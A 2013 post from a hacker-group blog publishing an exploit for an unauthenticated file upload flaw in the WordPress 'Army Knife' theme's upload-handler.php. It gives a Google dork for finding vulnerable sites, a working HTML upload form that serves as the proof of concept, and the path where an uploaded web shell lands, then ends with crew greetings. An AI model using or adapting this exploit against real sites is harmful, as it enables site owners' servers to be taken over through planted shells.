WordPress Army Knife CSRF File Upload Vulnerability ~ Rx420 Community

Sabtu, 09 November 2013

WordPress Army Knife CSRF File Upload Vulnerability

Posted by Erza Jullian 15.57, under Exploit | No comments

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability

Author: Bebyyers404

Date: 11/09/2013

Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/

Infected File: upload-handler.php

Category: webapps/php

Google dork: inurl:/wp-content/themes/armyknife

Tested on : Windows/Linux

Exploit & POC :

<form enctype="multipart/form-data"

action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

File path:

http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Rx420 Community

Categories

Sabtu, 09 November 2013

WordPress Army Knife CSRF File Upload Vulnerability

0 komentar:

Posting Komentar

Tags

Labels

Blog Archive

Blog Archive